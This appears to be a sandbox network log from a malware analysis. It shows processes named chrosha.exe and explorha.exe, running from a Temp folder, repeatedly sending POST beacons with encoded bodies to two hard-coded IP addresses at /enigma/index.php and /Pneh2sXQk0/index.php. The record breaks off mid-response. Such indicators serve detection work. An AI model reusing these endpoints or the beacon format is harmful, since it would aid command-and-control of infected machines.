                                                                                                                                                                                                                                      Apr 19, 2024 03:34:34.522779942 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:34.766560078 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      1002 | 192.168.2.5 | 50856 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:34.944438934 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:35.189697981 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      1003 | 192.168.2.5 | 50857 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:35.019114971 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:35.272346973 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1004 | 192.168.2.5 | 50858 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:35.451021910 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:35.704313040 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1005 | 192.168.2.5 | 50859 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:35.636626005 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:35.883553028 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1006 | 192.168.2.5 | 50860 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:36.069868088 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:36.316726923 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1007 | 192.168.2.5 | 50861 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:36.134154081 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:36.383733988 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1008 | 192.168.2.5 | 50862 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:36.569881916 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:36.826958895 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1009 | 192.168.2.5 | 50863 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:36.758793116 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:37.006424904 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1010 | 192.168.2.5 | 50864 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:37.181685925 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:37.425400972 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1011 | 192.168.2.5 | 50865 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:37.259490013 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:37.507762909 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1012 | 192.168.2.5 | 50866 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:37.681504965 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:37.935158968 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1013 | 192.168.2.5 | 50867 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:37.871017933 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:38.119838953 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1014 | 192.168.2.5 | 50868 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:38.285645008 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:38.525882959 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1015 | 192.168.2.5 | 50869 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:38.372169971 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:38.624025106 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1016 | 192.168.2.5 | 50870 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:38.778930902 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:39.032505989 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1017 | 192.168.2.5 | 50871 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:38.975946903 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:39.220607042 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1018 | 192.168.2.5 | 50872 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:39.402957916 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:39.647891998 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1019 | 192.168.2.5 | 50873 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:39.478950977 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:39.732130051 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1020 | 192.168.2.5 | 50874 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:39.902959108 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:40.154689074 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1021 | 192.168.2.5 | 50875 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:40.089191914 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:40.337080956 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:40 GMT
